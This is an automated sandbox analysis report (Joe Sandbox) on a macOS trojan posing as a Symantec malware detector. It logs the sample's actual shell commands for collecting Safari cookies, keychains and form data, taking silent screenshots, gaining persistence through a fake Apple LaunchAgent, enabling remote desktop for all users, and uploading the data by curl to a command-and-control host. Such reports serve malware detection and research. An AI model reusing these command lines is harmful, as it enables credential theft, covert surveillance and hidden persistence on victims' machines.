Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:46001
Start time:13:08:42
Joe Sandbox Product:Cloud
Start date:21.11.2017
Overall analysis duration:0h 14m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:BiyuYDBAMc (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.macAPP@0/50@15/0
Warnings:
Show All
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Creates files with functionality related to DES encryption and/or decryptionShow sources
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pyFound S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pyFound S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Executes the "openssl" command used for crypographic operationsShow sources
Source: /bin/sh (PID: 507)Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Writes files containing public keys to diskShow sources
Source: /usr/bin/unzip (PID: 502)File created 'PUBLIC KEY' pattern: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/sh (PID: 506)File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/cp (PID: 541)File created 'PUBLIC KEY' pattern: /Library/.random/xpcd.app/Contents/MacOS/xpc

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) socketsShow sources
Source: /sbin/route (PID: 479)Reads from socket in process: data
Source: /usr/bin/curl (PID: 513)Reads from socket in process: data
Source: /usr/bin/curl (PID: 516)Reads from socket in process: data
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Writes from file descriptors related to (network) socketsShow sources
Source: /sbin/route (PID: 479)Writes from socket in process: data
Source: /usr/bin/curl (PID: 513)Writes from socket in process: data
Source: /usr/bin/curl (PID: 516)Writes from socket in process: data
May scan ports using the "nc" (netcat) commandShow sources
Source: /bin/sh (PID: 510)Netcat executable (-z switch): /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Detected non-DNS traffic on DNS portShow sources
Source: global trafficTCP traffic: 192.168.0.50:49200 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listensShow sources
Source: /bin/sh (PID: 510)Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Pings several hosts (probably to check C&C connectivity)Show sources
Source: Ping host argumentsMore than 5 different servers pinged: abrahamlincolnisaliveandrunssymantec.com, symeher.co, symantecheurengine.com, kio2349329490jfdkf394.com, symheureng.com, klsadkla93242lokiloki.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Captures screenshots with shell command 'screencapture'Show sources
Source: /bin/sh (PID: 493)Screen captured: screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Enables system access through Apple's Remote Desktop Sharing for all usersShow sources
Source: /usr/bin/sudo (PID: 551)Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Explicitly creates screenshots silently (i.e. without playing sounds)Show sources
Source: /bin/sh (PID: 493)Screencapture executable (-x switch): screencapture -x /tmp/.dio3we/.prelim.png -> screencapture -x /tmp/.dio3we/.prelim.png
Uses kickstart to modify Apple's Remote Desktop settingsShow sources
Source: /usr/bin/sudo (PID: 551)Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.macAPP@0/50@15/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
App bundle is code signedShow sources
Source: Submitted file: BiyuYDBAMc.appCodeResources XML file: CodeResources
Source: Submitted file: BiyuYDBAMc.appCodeResources XML file: CodeResources
Creates application bundles containing icon filesShow sources
Source: /usr/bin/unzip (PID: 502)Icon file created: /tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)Icon file created: /Library/.random/xpcd.app/Contents/Resources/Finder.icns
Executes the "awk" command used to scan for patterns (usually in standard output)Show sources
Source: /bin/sh (PID: 480)Awk executable: /usr/bin/awk -> awk /gateway/ { print $2 }
Reads data from the local random generatorShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 485)Random device file read: /dev/random
Source: /usr/bin/zip (PID: 487)Random device file read: /dev/random
Source: /usr/sbin/screencapture (PID: 493)Random device file read: /dev/random
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 507)Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 513)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 513)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 516)Random device file read: /dev/random
Source: /usr/bin/perl5.18 (PID: 551)Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 503)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/unzip (PID: 502)XML plist file created: /private/tmp/xpc.app/Contents/Info.plist
Source: /usr/bin/unzip (PID: 502)Binary plist file created: /private/tmp/xpc.app/Contents/Resources/MainMenu.nib
Source: /bin/cp (PID: 541)XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/cp (PID: 541)Binary plist file created: /Library/.random/xpcd.app/Contents/Resources/MainMenu.nib
Source: /bin/sh (PID: 544)XML plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Source: /bin/sh (PID: 546)XML plist file created: /Library/LaunchAgents/com.apple.xpcd.plist
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 502)Permissions modifiied for written 64-bit Mach-O /private/tmp/xpc.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 541)Permissions modifiied for written 64-bit Mach-O /Library/.random/xpcd.app/Contents/MacOS/xpc: bits: - usr: rx grp: rx all: rwx
Checks the current date and time via Internet using a shell commandShow sources
Source: /bin/sh (PID: 513)HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Creates Python files with suspicious function namesShow sources
Source: /private/tmp/xpc.app/Contents/Resources/pbkdf2.pySuspicious function name: def xorstr(a, b):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def xorstr(self, x, y):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/xpc.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.pySuspicious function name: def xorstr(a, b):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def xorstr(self, x, y):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /Library/.random/xpcd.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 502)Bundle Info.plist file created: /tmp/xpc.app/Contents/Info.plist
Source: /bin/cp (PID: 541)Bundle Info.plist file created: /Library/.random/xpcd.app/Contents/Info.plist
Creates hidden files, links and/or directoriesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Hidden file created: /tmp/.dio3we/.dat.nosync01dc.lbqoPC
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Hidden file moved: /tmp/.dio3we/.dat.nosync01dc.lbqoPC -> /tmp/.dio3we/.lmx
Source: /bin/mkdir (PID: 481)Hidden Directory created: /tmp/.dio3we -> /tmp/.dio3we
Source: /usr/sbin/screencapture (PID: 493)Hidden file created: /tmp/.dio3we/..prelim.png-GB5W
Source: /usr/sbin/screencapture (PID: 493)Hidden file moved: /tmp/.dio3we/..prelim.png-GB5W -> /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 500)Hidden file created: /tmp/.sklerfde
Source: /usr/bin/unzip (PID: 502)Hidden file created: /tmp/xpc.app/Contents/Resources/.checksum
Source: /usr/bin/unzip (PID: 502)Hidden file created: /tmp/xpc.app/Contents/Resources/.crc32
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Hidden file created: /Library/.cachedir/.dat.nosync01f9.oWo2Oy
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Hidden file moved: /Library/.cachedir/.dat.nosync01f9.oWo2Oy -> /Library/.cachedir/.lmx
Source: /bin/mkdir (PID: 538)Hidden Directory created: /Library/.cachedir -> /Library/.cachedir
Source: /bin/mkdir (PID: 538)Hidden Directory created: /Library/.random -> /Library/.random
Source: /bin/cp (PID: 541)Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.checksum
Source: /bin/cp (PID: 541)Hidden file created: /Library/.random/xpcd.app/Contents/Resources/.crc32
Executes commands using a shell command-line interpreterShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c mkdir /tmp/.dio3we
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c zip -qr /tmp/.dio3we/backup_(null).zip /tmp/.dio3we && echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c find /tmp/.dio3we -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c screencapture -x /tmp/.dio3we/.prelim.png
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c csrutil status
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c echo '' | sudo -S echo success
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c echo 'vreni<0delim0>' > /tmp/.sklerfde
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec\ Malware\ Detector.app/Contents/Resources/sym03_2901.dat && xattr -c /tmp/xpc.app open /tmp/xpc.app
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7a+wrCidA8Z50sv1ExI0FQFqWATGGNKhY2X4TrHEcp0VrTpNbaL8uYo05LiHpowtPZ4Ej0kTtUbGMt7weQ6dVgtALtkcpMfZqC4ii89sb/PX0tIWnJkj2fPpDbMvj4m6dCim7VSO7rXJm81EO6I+cYXFrDNVdKUNO8doZjP2Fw7y/jJLdowusSb8YAnHNsi2KQ0tlZ0pFQmJWgSQ0QWMtCW1UE6tTK21kxP1u7OP6lKAQsYDO1tWyQw4L/X3YK/3Sy7ZBNE8tCWPKDtd1mxJxwcPJt5bcCjFxhqMXznBGHLdNDJHPq1t0ZBQyrRBUK5VbfcbnoruiMpph6FNaqZ7wIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symantecheurengine.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symheureng.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 symeher.co 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 kio2349329490jfdkf394.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 klsadkla93242lokiloki.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c ping -c 1 abrahamlincolnisaliveandrunssymantec.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c if [ -f /Library/.cachedir/.ptrun ] then echo success fi
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c cat /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c rm -rf /tmp/.sklerfde
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c killall Console killall Wireshark rm -rf grace_period echo '' | sudo -S mkdir -p /Library/.cachedir /Library/.random && sudo chmod -R 777 /Library/.cachedir /Library/.random && cp -R /tmp/xpc.app /Library/.random/xpcd.app && mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd && sudo sh -c 'echo '<?xml version=\'1.0\' encoding=\'UTF-8\'?><!DOCTYPE plist PUBLIC \'-//Apple//DTD PLIST 1.0//EN\' \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'><plist version=\'1.0\'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</strin
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c csrutil status
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c route -n get default | awk '/gateway/ { print $2 }'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c python /tmp/xpc.app/Contents/Resources/cb.py -f /Users/vreni/Library/Keychains/login.keychain -p 2>/dev/null > /tmp/.kcd && echo 'success'
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/KEYCHAINS.zip ~/Library/Keychains /Library/Keychains && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/SAFARI.zip ~/Library/Cookies ~/Library/Safari/History.db ~/Library/Safari/Bookmarks.plist ~/Library/Safari/Form\ Values && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c zip -qr /Library/.cachedir/backup_(null).zip /Library/.cachedir && echo success
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c find /Library/.cachedir -type f -not -name 'backup_(null).zip' -print0 | xargs -0 rm --
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c screencapture -x /Library/.cachedir/.prelim.png
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Shell command executed: /bin/sh -c a1511269823=`curl -s -F full_name='vreni' -F admin='1' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Library/.cachedir/backup_(null).zip' -F xml='@/Library/.cachedir/.lmx' -F username='vreni' -F screen='@/Library/.cachedir/.prelim.png' -F ssh_present='0' -F serial-F api_key=57432354a89c4bab15b1c7795507e44d74d21d9500c9d5307a3d71a7949f608b -F cts=1511269823 -F signature=13ba26234ba13dbd86138b9214f0edc304bf9926a7298a58aceeb48bf0270332 https://symantecheurengine.com/api/init` echo $a1511269823
Source: /usr/bin/sudo (PID: 544)Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>
Source: /usr/bin/sudo (PID: 546)Shell command executed: sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /usr/bin/perl5.18 (PID: 553)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users
Source: /usr/bin/perl5.18 (PID: 554)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid
Source: /usr/bin/perl5.18 (PID: 555)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid
Source: /usr/bin/perl5.18 (PID: 556)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid
Source: /usr/bin/perl5.18 (PID: 557)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid
Source: /usr/bin/perl5.18 (PID: 558)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid
Source: /usr/bin/perl5.18 (PID: 559)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid
Source: /usr/bin/perl5.18 (PID: 560)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid
Source: /usr/bin/perl5.18 (PID: 561)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid
Source: /usr/bin/perl5.18 (PID: 562)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid
Source: /usr/bin/perl5.18 (PID: 563)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid
Source: /usr/bin/perl5.18 (PID: 564)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid
Source: /usr/bin/perl5.18 (PID: 565)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid
Source: /usr/bin/perl5.18 (PID: 566)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid
Source: /usr/bin/perl5.18 (PID: 567)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid
Source: /usr/bin/perl5.18 (PID: 568)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid
Source: /usr/bin/perl5.18 (PID: 569)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid
Source: /usr/bin/perl5.18 (PID: 570)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid
Source: /usr/bin/perl5.18 (PID: 571)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid
Source: /usr/bin/perl5.18 (PID: 572)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid
Source: /usr/bin/perl5.18 (PID: 573)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid
Source: /usr/bin/perl5.18 (PID: 574)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid
Source: /usr/bin/perl5.18 (PID: 575)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid
Source: /usr/bin/perl5.18 (PID: 576)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid
Source: /usr/bin/perl5.18 (PID: 577)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid
Source: /usr/bin/perl5.18 (PID: 578)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid
Source: /usr/bin/perl5.18 (PID: 579)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid
Source: /usr/bin/perl5.18 (PID: 580)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid
